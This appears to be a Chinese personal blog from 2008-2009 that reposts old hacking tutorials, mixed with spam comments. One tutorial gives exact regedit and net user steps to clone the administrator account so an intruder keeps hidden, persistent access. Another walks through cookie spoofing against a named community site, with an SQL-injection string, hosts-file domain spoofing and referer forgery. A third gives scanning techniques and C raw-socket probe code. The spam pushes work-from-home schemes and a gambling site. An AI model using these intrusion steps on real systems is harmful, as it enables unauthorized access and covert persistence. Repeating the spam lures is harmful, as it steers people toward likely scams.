冰河

┌_姓名ベΔ藏头ξ诗，↑个性ゞ新亮≯ 点0.8624123

419824654@qq.com(冰河) — Mon, 24 Aug 2009 08:19:48 GMT

名字变成一首风格迥异的诗，体验“藏头诗”新时尚还可以为你的爱人设计爱情藏头诗快快去体验吧 www.shit19.cn 0.69089501243592

谁打牌厉害的.高手快來！poc2ltu0fk8e

419824654@qq.com(冰河) — Sun, 23 Aug 2009 09:55:58 GMT

注册就送6元钱!日赚千元不是梦www.qipai66.cn誰贏了錢記得請我吃飯哦!poc2ltu0fk8e

﹎网络ゆ兼职ゆ，轻﹎⒌松在家ご赚钱0.899506834288829

419824654@qq.com(冰河) — Sun, 09 Aug 2009 05:37:02 GMT

网络兼职赚钱，日赚50-300元招聘网站 http://jz.bnm07.cn 现在，有好多网上的创业兼职网站，给我感觉非常好!另外，兼职的时间很自由和灵活，可以自己掌握，每个人都可以做！在赚钱的同时，也会有自己学习或工作的时间。网络兼职，用业余时间积聚财富机遇就在这里，想兼职，想创业的朋友速来哦招聘网站 http://jz.bnm07.cn 0.913068151992312

网络兼职，轻松在家赚钱!!!0.0644305050673105

419824654@qq.com(冰河) — Tue, 28 Jul 2009 03:25:13 GMT

只需一部电脑就可以在家做得的兼职.经常在网上泡为啥不能做兼职呢？装了宽带别浪费如果你花一分钟去了解这个信息,那你就成功了一半!或许您已有一份很好的工作，又或许您正处于失业中……但不管怎样，您每天只要有几小时的上网时间，便可加盟兼职创业~！而您所要做的工作便是像我一样!如果您有兴趣的话;详情请登陆招聘网站::http://jz.bnm03.cn0.757982667422845

刚刚创建了《QQ飞车》新角色，来玩玩吧！

419824654@qq.com(冰河) — Tue, 03 Feb 2009 16:40:19 GMT

刚刚创建了《QQ飞车》新角色，来玩玩吧！《QQ飞车》很时尚也很好玩。当我发现我周围越来越多的朋友都玩上了《QQ飞车》，而且常常一玩就是好几个小时，完全沉浸在飙车的飞扬激情漂移的美妙乐趣中。于是我今天也兴致勃勃地下载了《QQ飞车》，创建了属于自己的角色，我的游戏昵称是：520ttm。
最火爆赛车网游《QQ飞车》主打时尚与好玩两大特色，清新浪漫逼真的场景设计，世界顶级的物理引擎、时尚的人物，炫酷的赛车、动感的音乐，真实的赛车手感、缤纷的赛道，边境赏金比赛、浪漫海滨同城聊天……带你进入一个极速炫目，浪漫休闲，激情飞扬的飞车世界。
朋友，你是不是也有玩飞车也喜欢玩飞车呢？给我留言吧，我们有空约好一起去赛道上跑一跑，看看谁的车技好。如果你是顶尖高手，那可要让着我哦，我车技嘛，还真不好说，赛场上见分晓，呵呵！
约好了，不见不散哦，让我们一起畅游《QQ飞车》极速世界，体验漂移无限乐趣吧！

《QQ 飞车》官方网站： http://speed.qq.com/?ADTAG=IED.InnerCop.Qzone.link

如何克隆管理员帐号

419824654@qq.com(冰河) — Fri, 05 Sep 2008 09:54:22 GMT

如何克隆管理员帐号

Author:Adam@nsfocus.com

Site:http://www.sometips.com

经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的
用户，似乎当管理员不存在一般，今天偶违背一下偶以前的初衷，Share一个类似于RootKit
的玩艺，当然，这些过程也是可以用脚本实现的，但是我就不写了，OK，Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里，默认管理员帐号的SID是固定的
500（0x1f4），那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆，在
这里我们选择的帐号是IUSR_MachineName（当然，为了加强隐蔽性，我们选择了这个帐号，
所有用户都可以用以下的方法，只不过这个用户较常见罢了），测试环境为Windows 2000 S
erver。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 H
ttp://www.sometips.com/soft/psu.exe)，然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出，然后编辑adam.reg文件，将adam.reg文
件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F
4"修改为IUSR_MachineName的SID（大部分的机器该用户的SID都为0x3E9，如果机器在最初安
装的时候没有安装IIS，而自己创建了帐号后再安装IIS就有可能不是这个值），将Root.reg
文件中的"1F4"修改为"3E9"后执行
regedit /s adam.reg
导入该Reg文件

然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密码（最好使用14位的密码，越像IUSR_MachineName的密码越好）

OK,大功告成...

这样，我们拥有和默认管理员一样的桌面、一样的Profile.....
而且，当我们运行 net localgroup administrators 时，看看结果：
C:\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

再看看USER2SID的输出结果：
C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想，再高明的管理员也看不到任何的异状了...而且，随便管理员改成什么密码，我照样可
以用IUSR_MachineName，密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IU
SR_MachineName为其他的名字吧)

^_^，这算不算RootKit...

附：
1、感谢叮叮付出需要reinstall OS的代价...
2、任何用以上方法进行试验所导致的系统无法使用均与偶无关，偶均不提供技术支持...

--
※ 来源: http://sinbad.dhs.org

作者：42423432 我要评论
发信人: 42423432 <2342342@1488.com>
标题: Re: 如何克隆管理员帐号
发信站: 辛巴达 (Sun Aug 4 19:16:26 2002)

【在 Sinbad 的大作中提到: 】
: 如何克隆管理员帐号
:
: Author:Adam@nsfocus.com
: Date:2002-04-28
: Site:http://www.sometips.com
:
: 经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的
: 用户，似乎当管理员不存在一般，今天偶违背一下偶以前的初衷，Share一个类似于RootKit
: 的玩艺，当然，这些过程也是可以用脚本实现的，但是我就不写了，OK，Show Time Now。
:
: 首先要让大家知道的概念是在Windows 2000和Windows NT里，默认管理员帐号的SID是固定的
: .....................

ＣＯＯＫＩＥ欺骗（上）

419824654@qq.com(冰河) — Thu, 04 Sep 2008 21:18:43 GMT

现在有很多社区网为了方便网友浏览，都使用了cookie技术以避免多次输入密码（就如the9
和vr），所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。

ＣＯＯＫＩＥ欺骗原理
按照浏览器的约定，只有来自同一域名的cookie才可以读写，而cookie只是浏览器的，对通
讯协议无影响，所以要进行cookie欺骗可以有多种途径：
１、跳过浏览器，直接对通讯数据改写
２、修改浏览器，让浏览器从本地可以读写任意域名cookie
３、使用签名脚本，让浏览器从本地可以读写任意域名cookie（有安全问题）
４、欺骗浏览器，让浏览器获得假的域名
其中：
方法１、２需要较专业的编程知识，对普通用户不太合适。
方法３的实现有２种方法：
１、直接使用签名脚本，不需要签名验证，但是产生很严重的安全问题，因为大家都要上网
的，如果这样做你的硬盘文件就……
２、对脚本进行签名后再使用签名脚本，但是需要专用的数字签名工具，对普通用户也不合
适。
方法４看样子应该是最合适的了，域名欺骗很简单，也不需要什么工具（当然如果你的机器
装有web服务器那更好了），下面我以the9为例，以这种方法为基础，阐述一下cookie欺骗的
过程（下文中提到的任何服务端的bug，the9都已经做了改进，所以本文对the9无安全方面的
影响）：

注：我们讨论的cookie是那种不会在硬盘的cookie文件里留下踪迹的cookie，就是那种只在
浏览器生存周期内（会话）产生的cookie，如果浏览器关闭（会话结束）那么这个cookie就
被删了！　

ＣＯＯＫＩＥ欺骗实战
the9在登陆的时候会返回３个cookie（这可把浏览器的警告cookie选项打开时看到）：
cgl_random（随即序列号）：登陆识别的记号
cgl_loginname（登陆名）：身份的识别记号
cgl_areaid（小区号）：你居住的小区号码
只要把cgl_loginname填入正确的登陆名，再对cgl_random进行修改，就可以达到欺骗服务程
序的目的。

一般欺骗php程序的字符串为：
1''or''1''=''1
把这个填入cgl_random，服务程序就被欺骗了！
因为服务程序不太可能对cookie进行语法检查（the9现在改进了），那么把这个字符串填入
，就可以成功的欺骗对方程序，而达到突破的目的了！

现在的问题是，如何使浏览器把这个我改过的cookie返回给the9？
看一看the9的域名吧：http://www.the9.com/，而浏览器的cookie警告已经告诉了我们这３
个cookie会返回给有.the9.com这个域名的服务器，哎？我的机器上正好有web服务器，那么
动手吧！
先编一个设置cookie的html，就叫cookie.htm吧，然后把这个cookie放进web目录，这样还不
行，因为我的机器的域名没设，那么设置host的名字，可是如果在网络设置中进行设置的话
，机器要重启动的，还是想想别的简单的办法吧！
然后我们应该编辑hosts文件，这个文件应该在windows目录下，你有可能找不到它，但是如
果你找到了hosts.sam文件，那么把它后面的扩展名去掉，就是我们要的文件了！
编辑hosts文件，填入以下一行:
127.0.0.1 www0.the9.com
解释一下，127.0.0.1是本机的lo地址，可以用做web地址，而www0.the9.com就是我们欺骗产
生的域名。
然后在浏览器中输入http://www0.the9.com/cookie.htm，看，页面出来了，快设置cookie吧
！
直接访问http;//www.the9.com/main.htm看看，不错吧！

但是不是所有的网友都有自己的web服务器啊！那怎么办呢？
其实如果你有个人主页的话，也可以达到cookie欺骗的目的，比如某个个人主页的服务器的
ip地址是1.2.3.4，先上传cookie.htm文件，再编辑hosts文件：
1.2.3.4 www0.the9.com
然后访问http://www0.the9.com/***/cookie.htm，其中***是你个人主页的地址目录。

对了我作了个工具在我的主页上，现在公开一下,http://home.etang.com/fsl/9the/，大家
知道该怎么做了吧？嘿嘿，不过你那样设置是没有用的，要这样编辑hosts：
etang的ip www.the9.com
the9的ip www0.the9.com
为什么要这样呢？我等会会告诉大家的

ＣＯＯＫＩＥ欺骗（下）

419824654@qq.com(冰河) — Thu, 04 Sep 2008 21:18:09 GMT

来源：http://sunviva.yeah.net
　
继续the9的cookie讨论，还有2个cookie：
cgl_mainshowinfo（个人信息）
cgl_showinfo_changed（意义不知）
由于第二个cookie不知道是什么，所以就讨论第一个。
第一个cookie存放着你在the9的名字、称号、居住的小区、街道、是否有工作、星级、门牌
号等的信息（目前只知道这些，其余的信息不知其意义，具体格式就让给大家去分析了），
但是中文都escape过了，如果你用的不是netscpae而是ie的话，不能用unescape得知其信息
，因为ie对双字节采用unicode而不采用ascii，如果哪天the9也支持unicode就好了！：），
但是其他网站站长注意了，你们可通过cgi的形式把这些the9居民信息抓过来实现数据共享！
哈哈……，如果你们真要这么做，就只有使用签名脚本了，总不能让别人编辑hosts吧（不过
得注意版权哦！）？

ie的cookie漏洞：
如果你用的是ie的话，由于ie本身的漏洞，你大可不必编辑hosts，就可以同样做到读写别的
域名的cookie，你可以使用以下的方法欺骗ie（具体的可以去www.cookiecentral.com看看）
：
假设你的主页文件为http://a.com/cookie.htm，
使用以下url： http://a%2Ecom%2Fcookie%2Ehtm%3F.the9.com
如果直接输在浏览器地址栏里不行，就作个script，把location的值设为这个就可以了！
这个地址转换后应该是这样的： http://a.com/cookie.htm?.the9.com
由于ie的bug，误把前面那个的域名以为是.the9.com了！

hosts文件解释
hosts文件实际上可以看成一个本机的dns系统，它可以负责把域名解释成ip地址，它的优先
权比dns服务器要高，它的具体实现是TCP/IP协议中的一部分。
如果有这么一行：
202.109.110.3 www.the9.com
那么在输入www.the9.com时，网络协议会首先检查hosts文件找到匹配的，如果找不到再去d
ns查，这样你访问www.the9.com实际上是访问202.109.110.3，而不是通常的202.109.110.2
。
注：由于缓存的作用，如果开着浏览器编辑hosts的话，hosts里的内容有可能不会当场生效
，你可以重新启动浏览器或等一会时间再试一下！

关于ＲＥＦＥＲＥＲ的欺骗（这个虽然不属于cookie欺骗，但是懒得再写一篇，就归在一起
了）
referer是http头，它的作用是签定用户是从何处引用连接的，在the9，服务程序就充分利用
了这一点，如过你是手动输入url的话，那么referer不会设任何值，服务程序就返回什么“
投机取巧”的字样！
由于我们前面对浏览器进行了域名欺骗，那么referer也被欺骗了，但是服务程序对referer
是整个主机名检查，所以www0.the9.com的域名就欺骗不了服务器，所以得用www.the9.com欺
骗，那么还得设一个域名方便我们访问the9，而且还得让cookie返回给这个真的the9，那么
就用www0.the9.com吧！（这回知道前面访问我主页工具时要那样编辑hosts了吧？）
如果你用了这个方法的话，那么你就不能直接点击the9的连接，而得用工具中的地址欺骗来
进行访问，至于这样做的好处，大家自己找找吧，我就不想详细说了，太累了！

关于netvampire：
这个下载工具大家都知道吧？那么它的3.3版大家用过吗？很棒的！因为它可以直接让大家改
变下载连接的referer，而且它还能继承浏览器的cookie，把cookie返回给服务端（不过coo
kie不能改，如果能改的话，这个工具就太………………）

后记
好了关于cookie及referer就说到这了，在这个星期以前利用cookie欺骗的话the9的门户可是
大开的（当然似乎还有通用密码什么的），不过the9虽然改进了，我不能保证其他社区网也
改进了，当然本文只是探讨技术，不负什么法律责任

高级扫描技术及原理介绍

419824654@qq.com(冰河) — Thu, 04 Sep 2008 21:17:47 GMT

作者：refdom
Scan，是一切入侵的基础，对主机的探测工具非常多，比如大名鼎鼎的nmap。我这里没有什么新鲜技术，都是一些老东西老话题，即使参考的Phrack文档也甚至是96年的老文档，我只是拾人牙慧而已。
最基本的探测就是Ping，不过现在连基本的个人防火墙都对Ping做了限制，这个也太基本了。如果透过防火墙，如何获得最理想的目标图，也是很多人整天思考的问题。

一、高级ICMP扫描技术

Ping就是利用ICMP协议走的，我们在这里主要是利用ICMP协议最基本的用途：报错，根据网络协议，如果按照协议出现了错误，那么接收端将产生一个ICMP的错误报文。这些错误报文并不是主动发送的，而是由于错误，根据协议自动产生。

当IP数据报出现checksum和版本的错误的时候，目标主机将抛弃这个数据报，如果是checksum出现错误，那么路由器就直接丢弃这个数据报了。有些主机比如AIX、HP-UX等，是不会发送ICMP的Unreachable数据报的。

我们利用下面这些特性：
1、向目标主机发送一个只有IP头的IP数据包，目标将返回Destination Unreachable的ICMP错误报文。
2、向目标主机发送一个坏IP数据报，比如，不正确的IP头长度，目标主机将返回Parameter Problem的ICMP错误报文。
3、当数据包分片但是，却没有给接收端足够的分片，接收端分片组装超时会发送分片组装超时的ICMP数据报。

向目标主机发送一个IP数据报，但是协议项是错误的，比如协议项不可用，那么目标将返回Destination Unreachable的ICMP报文，但是如果是在目标主机前有一个防火墙或者一个其他的过滤装置，可能过滤掉提出的要求，从而接收不到任何回应。可以使用一个非常大的协议数字来作为IP头部的协议内容，而且这个协议数字至少在今天还没有被使用，应该主机一定会返回Unreachable，如果没有Unreachable的ICMP数据报返回错误提示，那么就说明被防火墙或者其他设备过滤了，我们也可以用这个办法来探测是否有防火墙或者其他过滤设备存在。

利用IP的协议项来探测主机正在使用哪些协议，我们可以把IP头的协议项改变，因为是8位的，有256种可能。通过目标返回的ICMP错误报文，来作判断哪些协议在使用。如果返回Destination Unreachable，那么主机是没有使用这个协议的，相反，如果什么都没有返回的话，主机可能使用这个协议，但是也可能是防火墙等过滤掉了。NMAP的IP Protocol scan也就是利用这个原理。

利用IP分片造成组装超时ICMP错误消息，同样可以来达到我们的探测目的。当主机接收到丢失分片的数据报，并且在一定时间内没有接收到丢失的数据报，就会丢弃整个包，并且发送ICMP分片组装超时错误给原发送端。我们可以利用这个特性制造分片的数据包，然后等待ICMP组装超时错误消息。可以对UDP分片，也可以对TCP甚至ICMP数据包进行分片，只要不让目标主机获得完整的数据包就行了，当然，对于UDP这种非连接的不可靠协议来说，如果我们没有接收到超时错误的ICMP返回报，也有可能时由于线路或者其他问题在传输过程中丢失了。

我们能够利用上面这些特性来得到防火墙的ACL（access list），甚至用这些特性来获得整个网络拓扑结构。如果我们不能从目标得到Unreachable报文或者分片组装超时错误报文，可以作下面的判断：
1、防火墙过滤了我们发送的协议类型
2、防火墙过滤了我们指定的端口
3、防火墙阻塞ICMP的Destination Unreachable或者Protocol Unreachable错误消息。
4、防火墙对我们指定的主机进行了ICMP错误报文的阻塞。

二、高级TCP扫描技术

最基本的利用TCP扫描就是使用connect()，这个很容易实现，如果目标主机能够connect，就说明一个相应的端口打开。不过，这也是最原始和最先被防护工具拒绝的一种。
在高级的TCP扫描技术中主要利用TCP连接的三次握手特性来进行，也就是所谓的半开扫描。这些办法可以绕过一些防火墙，而得到防火墙后面的主机信息。当然，是在不被欺骗的情况下的。下面这些方法还有一个好处就是比较难于被记录，有的办法即使在用netstat命令上也根本显示不出来。

SYN
向远端主机某端口发送一个只有SYN标志位的TCP数据报，如果主机反馈一个SYN || ACK数据包，那么，这个主机正在监听该端口，如果反馈的是RST数据包，说明，主机没有监听该端口。在X-Scanner 上就有SYN的选择项。

ACK
发送一个只有ACK标志的TCP数据报给主机，如果主机反馈一个TCP RST数据报来，那么这个主机是存在的。

FIN
对某端口发送一个TCP FIN数据报给远端主机。如果主机没有任何反馈，那么这个主机是存在的，而且正在监听这个端口；主机反馈一个TCP RST回来，那么说明该主机是存在的，但是没有监听这个端口。

NULL
即发送一个没有任何标志位的TCP包，根据RFC793，如果目标主机的相应端口是关闭的话，应该发送回一个RST数据包。

FIN+URG+PUSH
向目标主机发送一个Fin、URG和PUSH分组，根据RFC793，如果目标主机的相应端口是关闭的，那么应该返回一个RST标志。

三、高级UDP扫描技术
在UDP实现的扫描中，多是了利用和ICMP进行的组合进行，这在ICMP中以及提及了。还有一些特殊的就是UDP回馈，比如SQL SERVER，对其1434端口发送‘x02’或者‘x03’就能够探测得到其连接端口。

下面这段程序就是一个TCP探测的例子，当然，并没有做得完美，因为没有接收部分，而在WIN2000下实际就是一个选择性的SNIFFER，呵呵，大家可以使用其他的SNIFFER来实现同样的目的。也可以改变下面的程序只发送IP包，利用ICMP特性来实现探测。

#include
#include
#include

#define SOURCE_PORT 7234
#define MAX_RECEIVEBYTE 255

typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度（字节）
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IPHEADER;

typedef struct tsd_hdr //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSDHEADER;

typedef struct tcp_hdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCPHEADER;

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}

void usage()
{
printf("******************************************
");
printf("TCPPing
");
printf(" Written by Refdom
");
printf(" Email: refdom@263.net
");
printf("Useage: TCPPing.exe Target_ip Target_port
");
printf("*******************************************
");
}

int main(int argc, char* argv[])
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;

char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;

usage();

if (argc!= 3)
{ return false; }

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!
");
return false;
}

if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{
printf("Socket Setup Error!
");
return false;
}
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!
");
return false;
}

nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)
{
printf("setsockopt SO_SNDTIMEO error!
");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(atoi(argv[2]));
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

//
//
//填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
// ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=inet_addr("本地地址");
ipHeader.destIP=inet_addr(argv[1]);

//填充TCP首部
tcpHeader.th_dport=htons(atoi(argv[2]));
tcpHeader.th_sport=htons(SOURCE_PORT); //源端口号
tcpHeader.th_seq=htonl(0x12345678);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2; //修改这里来实现不同的标志位探测，2是SYN，1是FIN，16是ACK探测等等
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_sum=0;

psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));

//计算校验和
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),
0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%d
",WSAGetLastError());
return false;
}
else
printf("send ok!
");

closesocket(sock);
WSACleanup();

return 0;
}

-------------------------------------------

reference：

1、《Breaking into computer networks from the Internet》 Roelof Temmingh & SensePost (Pty) Ltd
2、Phrack #49，《Port Scanning without the SYN flag》
3、Phrack #51，《The Art of Port Scanning》
4、Sys-Security Group《ICMP Usage in Scanning》